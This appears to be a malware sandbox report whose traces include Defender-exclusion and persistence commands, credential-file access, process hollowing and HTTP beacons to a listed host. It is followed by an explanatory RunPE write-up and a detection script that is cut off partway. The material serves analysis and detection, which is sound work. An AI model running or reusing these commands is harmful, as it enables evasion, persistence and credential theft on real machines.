description Code injection with CreateRemoteThread in a remote process rule Code_injection
description Match Windows Http API call rule Str_Win32_Http_API
description Match Windows Inet API call rule Str_Win32_Internet_API
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
description Communications over HTTP rule Network_HTTP
description Code injection with CreateRemoteThread in a remote process rule Code_injection
description Match Windows Http API call rule Str_Win32_Http_API
description Match Windows Inet API call rule Str_Win32_Internet_API
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN blfte.exe /TR "C:\Users\test22\AppData\Local\Temp\9be4a78dfb\blfte.exe" /F
cmdline "C:\Users\test22\AppData\Local\Temp\6124f2a7-8a2c-4783-89ce-0314c0f4a84f\AdvancedRun.exe" /EXEFilename "C:\Users\test22\AppData\Local\Temp\6124f2a7-8a2c-4783-89ce-0314c0f4a84f\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
cmdline "C:\Users\test22\AppData\Local\Temp\a2ad8163-11d5-4f89-89e5-fc093bda31ef\AdvancedRun.exe" /EXEFilename "C:\Users\test22\AppData\Local\Temp\a2ad8163-11d5-4f89-89e5-fc093bda31ef\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
cmdline REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\test22\AppData\Local\Temp\9be4a78dfb\
cmdline C:\Users\test22\AppData\Local\Temp\a2ad8163-11d5-4f89-89e5-fc093bda31ef\AdvancedRun.exe /EXEFilename "C:\Users\test22\AppData\Local\Temp\a2ad8163-11d5-4f89-89e5-fc093bda31ef\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
cmdline "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\test22\AppData\Local\Temp\9be4a78dfb\
cmdline C:\Users\test22\AppData\Local\Temp\6124f2a7-8a2c-4783-89ce-0314c0f4a84f\AdvancedRun.exe /EXEFilename "C:\Users\test22\AppData\Local\Temp\6124f2a7-8a2c-4783-89ce-0314c0f4a84f\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN blfte.exe /TR "C:\Users\test22\AppData\Local\Temp\9be4a78dfb\blfte.exe" /F
cmdline cmd /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\test22\AppData\Local\Temp\9be4a78dfb\
host 185.215.113.38
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 3028
region_size: 225280
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000428
1 0 0

NtAllocateVirtualMemory

process_identifier: 2540
region_size: 225280
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000414
1 0 0
file C:\ProgramData\AVAST Software
file C:\ProgramData\Avira
file C:\ProgramData\Kaspersky Lab
file C:\ProgramData\Panda Security
file C:\ProgramData\Bitdefender
file C:\ProgramData\AVG
file C:\ProgramData\Doctor Web
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN blfte.exe /TR "C:\Users\test22\AppData\Local\Temp\9be4a78dfb\blfte.exe" /F
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN blfte.exe /TR "C:\Users\test22\AppData\Local\Temp\9be4a78dfb\blfte.exe" /F
file C:\Users\test22\AppData\Roaming\FileZilla\sitemanager.xml
registry HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions
file C:\Users\test22\AppData\Roaming\.purple\accounts.xml
Time & API Arguments Status Return Repeated

WriteProcessMemory

buffer:
base_address: 0x00400000
process_identifier: 3028
process_handle: 0x00000428
1 1 0

WriteProcessMemory

buffer: €0€ HX@häh4VS_VERSION_INFO½ïþ?ÈStringFileInfo¤040904b1, CommentsSTWE LXVK(CompanyNameZwV8FileDescriptionIAh UXt0FileVersion2.4.3.7: InternalNameAEUM Sty.exez+LegalCopyrightCopyright 2020 © LMF. All rights reserved.2LegalTrademarksEKeHB OriginalFilenameAEUM Sty.exe2 ProductNameAEUM Sty4ProductVersion3.6.5.58Assembly Version3.6.5.5DVarFileInfo$Translation PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING
base_address: 0x00434000
process_identifier: 3028
process_handle: 0x00000428
1 1 0

WriteProcessMemory

buffer: @
base_address: 0xfffde008
process_identifier: 3028
process_handle: 0x00000428
1 1 0

WriteProcessMemory

buffer:
base_address: 0x00400000
process_identifier: 2540
process_handle: 0x00000414
1 1 0

WriteProcessMemory

buffer: €0€ HX@häh4VS_VERSION_INFO½ïþ?ÈStringFileInfo¤040904b1, CommentsSTWE LXVK(CompanyNameZwV8FileDescriptionIAh UXt0FileVersion2.4.3.7: InternalNameAEUM Sty.exez+LegalCopyrightCopyright 2020 © LMF. All rights reserved.2LegalTrademarksEKeHB OriginalFilenameAEUM Sty.exe2 ProductNameAEUM Sty4ProductVersion3.6.5.58Assembly Version3.6.5.5DVarFileInfo$Translation PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING
base_address: 0x00434000
process_identifier: 2540
process_handle: 0x00000414
1 1 0

WriteProcessMemory

buffer: @
base_address: 0xfffde008
process_identifier: 2540
process_handle: 0x00000414
1 1 0
Time & API Arguments Status Return Repeated

WriteProcessMemory

buffer:
base_address: 0x00400000
process_identifier: 3028
process_handle: 0x00000428
1 1 0

WriteProcessMemory

buffer:
base_address: 0x00400000
process_identifier: 2540
process_handle: 0x00000414
1 1 0
registry HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Process injection Process 2648 called NtSetContextThread to modify thread in remote process 3028
Process injection Process 1568 called NtSetContextThread to modify thread in remote process 2540
Time & API Arguments Status Return Repeated

NtSetContextThread

registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4257067
registers.ebp: 0
registers.edx: 0
registers.ebx: -139264
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000424
process_identifier: 3028
1 0 0

NtSetContextThread

registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4257067
registers.ebp: 0
registers.edx: 0
registers.ebx: -139264
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000410
process_identifier: 2540
1 0 0
cmd "c:\windows\system32\schtasks.exe" /create /sc minute /mo 1 /tn blfte.exe /tr "c:\users\test22\appdata\local\temp\9be4a78dfb\blfte.exe" /f
cmd "c:\windows\system32\rundll32.exe" c:\programdata\1428cad52d922f\cred.dll, main
cmd "c:\windows\system32\windowspowershell\v1.0\powershell.exe" add-mppreference -exclusionpath "c:\users\test22\appdata\local\temp\ao.exe" -force
cmd timeout 1
cmd rundll32.exe c:\programdata\1428cad52d922f\cred.dll, main
cmd "c:\users\test22\appdata\local\temp\6124f2a7-8a2c-4783-89ce-0314c0f4a84f\advancedrun.exe" /exefilename "c:\users\test22\appdata\local\temp\6124f2a7-8a2c-4783-89ce-0314c0f4a84f\test.bat" /windowstate ""0"" /priorityclass ""32"" /commandline "" /startdirectory "" /runas 8 /run
cmd powershell add-mppreference -exclusionpath "c:\users\test22\appdata\local\temp\9be4a78dfb\blfte.exe" -force
cmd rundll32.exe c:\programdata\1428cad52d922f\scr.dll, main
cmd "c:\users\test22\appdata\local\temp\a2ad8163-11d5-4f89-89e5-fc093bda31ef\advancedrun.exe" /exefilename "c:\users\test22\appdata\local\temp\a2ad8163-11d5-4f89-89e5-fc093bda31ef\test.bat" /windowstate ""0"" /priorityclass ""32"" /commandline "" /startdirectory "" /runas 8 /run
cmd c:\users\test22\appdata\local\temp\ao.exe
cmd "c:\windows\system32\rundll32.exe" c:\programdata\1428cad52d922f\scr.dll, main
cmd c:\users\test22\appdata\local\temp\9be4a78dfb\blfte.exe
cmd reg add "hkcu\software\microsoft\windows\currentversion\explorer\user shell folders" /f /v startup /t reg_sz /d c:\users\test22\appdata\local\temp\9be4a78dfb\
cmd c:\users\test22\appdata\local\temp\a2ad8163-11d5-4f89-89e5-fc093bda31ef\advancedrun.exe /exefilename "c:\users\test22\appdata\local\temp\a2ad8163-11d5-4f89-89e5-fc093bda31ef\test.bat" /windowstate ""0"" /priorityclass ""32"" /commandline "" /startdirectory "" /runas 8 /run
cmd "c:\windows\system32\windowspowershell\v1.0\powershell.exe" add-mppreference -exclusionpath "c:\users\test22\appdata\local\temp\9be4a78dfb\blfte.exe" -force
cmd "c:\windows\system32\cmd.exe" /c reg add "hkcu\software\microsoft\windows\currentversion\explorer\user shell folders" /f /v startup /t reg_sz /d c:\users\test22\appdata\local\temp\9be4a78dfb\
cmd "c:\users\test22\appdata\local\temp\9be4a78dfb\blfte.exe"
cmd powershell add-mppreference -exclusionpath "c:\users\test22\appdata\local\temp\ao.exe" -force
cmd cmd.exe /c timeout 1
cmd "c:\windows\system32\cmd.exe" /c timeout 1
cmd c:\users\test22\appdata\local\temp\6124f2a7-8a2c-4783-89ce-0314c0f4a84f\advancedrun.exe /exefilename "c:\users\test22\appdata\local\temp\6124f2a7-8a2c-4783-89ce-0314c0f4a84f\test.bat" /windowstate ""0"" /priorityclass ""32"" /commandline "" /startdirectory "" /runas 8 /run
cmd schtasks /create /sc minute /mo 1 /tn blfte.exe /tr "c:\users\test22\appdata\local\temp\9be4a78dfb\blfte.exe" /f
cmd cmd /c reg add "hkcu\software\microsoft\windows\currentversion\explorer\user shell folders" /f /v startup /t reg_sz /d c:\users\test22\appdata\local\temp\9be4a78dfb\
Time & API Arguments Status Return Repeated

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc0010
post_data: id=152138328664&vs=2.20&sd=ab27f8&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc0010
post_data: id=152138328664&vs=2.20&sd=ab27f8&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc0010
post_data: id=152138328664&vs=2.20&sd=ab27f8&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc0010
post_data: id=152138328664&vs=2.20&sd=ab27f8&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc0010
post_data: id=152138328664&vs=2.20&sd=ab27f8&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc0010
post_data: id=152138328664&vs=2.20&sd=ab27f8&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc0010
post_data: id=152138328664&vs=2.20&sd=ab27f8&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc0010
post_data: id=152138328664&vs=2.20&sd=ab27f8&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc0010
post_data: id=152138328664&vs=2.20&sd=ab27f8&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc0010
post_data: id=152138328664&vs=2.20&sd=ab27f8&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc0010
post_data: id=152138328664&vs=2.20&sd=ab27f8&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc0010
post_data: id=152138328664&vs=2.20&sd=ab27f8&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc0010
post_data: id=152138328664&vs=2.20&sd=ab27f8&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc0010
post_data: id=152138328664&vs=2.20&sd=ab27f8&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc0010
post_data: id=152138328664&vs=2.20&sd=ab27f8&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc0010
post_data: id=152138328664&vs=2.20&sd=ab27f8&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=152138328664&vs=2.20&sd=ab27f8&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=152138328664&vs=2.20&sd=ab27f8&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=152138328664&vs=2.20&sd=ab27f8&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=152138328664&vs=2.20&sd=ab27f8&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=152138328664&vs=2.20&sd=ab27f8&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=152138328664&vs=2.20&sd=ab27f8&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=152138328664&vs=2.20&sd=ab27f8&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=152138328664&vs=2.20&sd=ab27f8&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=152138328664&vs=2.20&sd=ab27f8&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=152138328664&vs=2.20&sd=ab27f8&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=152138328664&vs=2.20&sd=ab27f8&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=152138328664&vs=2.20&sd=ab27f8&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=152138328664&vs=2.20&sd=ab27f8&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=152138328664&vs=2.20&sd=ab27f8&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=152138328664&vs=2.20&sd=ab27f8&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=152138328664&vs=2.20&sd=ab27f8&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0
1 1 0
Process injection Process 2648 resumed a thread in remote process 3028
Process injection Process 1568 resumed a thread in remote process 2540
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x00000424
suspend_count: 1
process_identifier: 3028
1 0 0

NtResumeThread

thread_handle: 0x00000410
suspend_count: 1
process_identifier: 2540
1 0 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Spynet
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe
description attempts to modify windows defender policies registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable
description attempts to modify windows defender policies registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring
description attempts to modify windows defender policies registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware
description attempts to modify windows defender policies registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x000000e0
suspend_count: 1
process_identifier: 2648
1 0 0

NtResumeThread

thread_handle: 0x00000154
suspend_count: 1
process_identifier: 2648
1 0 0

NtResumeThread

thread_handle: 0x00000194
suspend_count: 1
process_identifier: 2648
1 0 0

NtResumeThread

thread_handle: 0x0000020c
suspend_count: 1
process_identifier: 2648
1 0 0

NtGetContextThread

thread_handle: 0x000000e8
1 0 0

NtGetContextThread

thread_handle: 0x000000e8
1 0 0

NtResumeThread

thread_handle: 0x000000e8
suspend_count: 1
process_identifier: 2648
1 0 0

NtGetContextThread

thread_handle: 0x000000e8
1 0 0

NtGetContextThread

thread_handle: 0x000000e8
1 0 0

NtResumeThread

thread_handle: 0x000000e8
suspend_count: 1
process_identifier: 2648
1 0 0

NtGetContextThread

thread_handle: 0x000000e8
1 0 0

NtGetContextThread

thread_handle: 0x000000e8
1 0 0

NtResumeThread

thread_handle: 0x000000e8
suspend_count: 1
process_identifier: 2648
1 0 0

CreateProcessInternalW

thread_identifier: 2264
thread_handle: 0x00000398
process_identifier: 2244
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Users\test22\AppData\Local\Temp\a2ad8163-11d5-4f89-89e5-fc093bda31ef\AdvancedRun.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\a2ad8163-11d5-4f89-89e5-fc093bda31ef\AdvancedRun.exe" /EXEFilename "C:\Users\test22\AppData\Local\Temp\a2ad8163-11d5-4f89-89e5-fc093bda31ef\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
filepath_r: C:\Users\test22\AppData\Local\Temp\a2ad8163-11d5-4f89-89e5-fc093bda31ef\AdvancedRun.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000003a0
1 1 0

CreateProcessInternalW

thread_identifier: 1572
thread_handle: 0x000003f0
process_identifier: 2448
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\ao.exe" -Force
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000408
1 1 0

CreateProcessInternalW

thread_identifier: 2216
thread_handle: 0x000003e8
process_identifier: 2444
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\cmd.exe
track: 1
command_line: "C:\Windows\System32\cmd.exe" /c timeout 1
filepath_r: C:\Windows\System32\cmd.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000414
1 1 0

CreateProcessInternalW

thread_identifier: 1452
thread_handle: 0x00000424
process_identifier: 3028
current_directory:
filepath: C:\Users\test22\AppData\Local\Temp\ao.exe
track: 1
command_line:
filepath_r: C:\Users\test22\AppData\Local\Temp\ao.exe
stack_pivoted: 0
creation_flags: 134217732 (CREATE_NO_WINDOW|CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x00000428
1 1 0

NtGetContextThread

thread_handle: 0x00000424
1 0 0

NtAllocateVirtualMemory

process_identifier: 3028
region_size: 225280
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000428
1 0 0

WriteProcessMemory

buffer:
base_address: 0x00400000
process_identifier: 3028
process_handle: 0x00000428
1 1 0

WriteProcessMemory

buffer:
base_address: 0x00401000
process_identifier: 3028
process_handle: 0x00000428
1 1 0

WriteProcessMemory

buffer:
base_address: 0x00426000
process_identifier: 3028
process_handle: 0x00000428
1 1 0

WriteProcessMemory

buffer:
base_address: 0x0042f000
process_identifier: 3028
process_handle: 0x00000428
1 1 0

WriteProcessMemory

buffer: €0€ HX@häh4VS_VERSION_INFO½ïþ?ÈStringFileInfo¤040904b1, CommentsSTWE LXVK(CompanyNameZwV8FileDescriptionIAh UXt0FileVersion2.4.3.7: InternalNameAEUM Sty.exez+LegalCopyrightCopyright 2020 © LMF. All rights reserved.2LegalTrademarksEKeHB OriginalFilenameAEUM Sty.exe2 ProductNameAEUM Sty4ProductVersion3.6.5.58Assembly Version3.6.5.5DVarFileInfo$Translation PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING
base_address: 0x00434000
process_identifier: 3028
process_handle: 0x00000428
1 1 0

WriteProcessMemory

buffer:
base_address: 0x00435000
process_identifier: 3028
process_handle: 0x00000428
1 1 0

WriteProcessMemory

buffer: @
base_address: 0xfffde008
process_identifier: 3028
process_handle: 0x00000428
1 1 0

NtSetContextThread

registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4257067
registers.ebp: 0
registers.edx: 0
registers.ebx: -139264
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000424
process_identifier: 3028
1 0 0

NtResumeThread

thread_handle: 0x00000424
suspend_count: 1
process_identifier: 3028
1 0 0
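
The records above capture two behaviours worth pulling out of the raw trace. The first is the `Add-MpPreference -ExclusionPath ... ao.exe -Force` command line near the top, which adds the dropped sample to Microsoft Defender's exclusion list. The second is the chain against pid 3028: a CreateProcessInternalW of ao.exe itself with CREATE_SUSPENDED, an NtAllocateVirtualMemory of 225280 bytes at 0x00400000 with PAGE_EXECUTE_READWRITE, WriteProcessMemory calls that place an MZ/PE header at 0x00400000 and its sections above it, a four-byte write at 0xfffde008, then NtSetContextThread and NtResumeThread on the child's first thread. That is the RunPE pattern: the parent starts a suspended copy of itself, replaces the image at its own base, and resumes the thread on the new code. The script below is an added example written for this page, not code from the sandbox or from the sample; it re-parses a constructed, abridged copy of those records (values copied from the report, fields trimmed) and flags both behaviours. Two assumptions are labelled in the comments: on x86 the initial thread of a new process carries the entry point in EAX and the PEB address in EBX, so the reported eax 4257067 is 0x40F52B (inside the region written at 0x00400000) and ebx -139264 is 0xFFFDE000 as an unsigned 32-bit value; and the write at 0xfffde008 is therefore ebx+8, the offset of ImageBaseAddress in the 32-bit PEB, which is consistent with the image-base patch RunPE loaders perform.

```python
import re

# Constructed, abridged excerpt in the report's "API / key: value / status return repeated" layout.
# Values are copied from the report; records are trimmed to the fields the detectors read.
TRACE = r"""
CreateProcessInternalW
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\ao.exe" -Force
1 1 0

CreateProcessInternalW
process_identifier: 3028
filepath: C:\Users\test22\AppData\Local\Temp\ao.exe
command_line:
creation_flags: 134217732 (CREATE_NO_WINDOW|CREATE_SUSPENDED)
1 1 0

NtAllocateVirtualMemory
process_identifier: 3028
region_size: 225280
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
1 0 0

WriteProcessMemory
buffer: MZ...
base_address: 0x00400000
process_identifier: 3028
1 1 0

WriteProcessMemory
buffer: @
base_address: 0xfffde008
process_identifier: 3028
1 1 0

NtSetContextThread
registers.eax: 4257067
registers.ebx: -139264
process_identifier: 3028
1 0 0

NtResumeThread
process_identifier: 3028
1 0 0
"""

STATUS_RE = re.compile(r"^(\d+) (\d+) (\d+)$")           # status return repeated
ARG_RE = re.compile(r"^([A-Za-z_][\w.]*):(?:\s(.*))?$")   # key: value (value may be empty)
EXCLUSION_RE = re.compile(r"Add-MpPreference\b.*?-Exclusion(?:Path|Process|Extension|IpAddress)\b", re.I)

def parse_trace(text):
    """Group lines into {"api", "args"} records; a bare status line closes the current record."""
    calls, cur = [], None
    for line in (raw.strip() for raw in text.splitlines()):
        if not line:
            continue
        if STATUS_RE.match(line):
            if cur is not None:
                calls.append(cur)
            cur = None
        elif (m := ARG_RE.match(line)) and cur is not None:
            cur["args"][m[1]] = (m[2] or "").strip()
        else:
            cur = {"api": line, "args": {}}
    return calls

def find_defender_exclusions(calls):
    """Command lines that add a Microsoft Defender exclusion (ATT&CK T1562.001)."""
    return [c["args"]["command_line"] for c in calls
            if c["api"] == "CreateProcessInternalW" and EXCLUSION_RE.search(c["args"].get("command_line", ""))]

def find_process_hollowing(calls):
    """Per suspended child: RWX alloc -> PE written -> PEB patched -> NtSetContextThread -> NtResumeThread."""
    targets, findings = {}, []
    for c in calls:
        api, args = c["api"], c["args"]
        pid = args.get("process_identifier")
        t = targets.get(pid)
        if api == "CreateProcessInternalW" and "CREATE_SUSPENDED" in args.get("creation_flags", ""):
            targets[pid] = {"image": args.get("filepath", ""), "rwx": [], "writes": set(), "pe_base": None}
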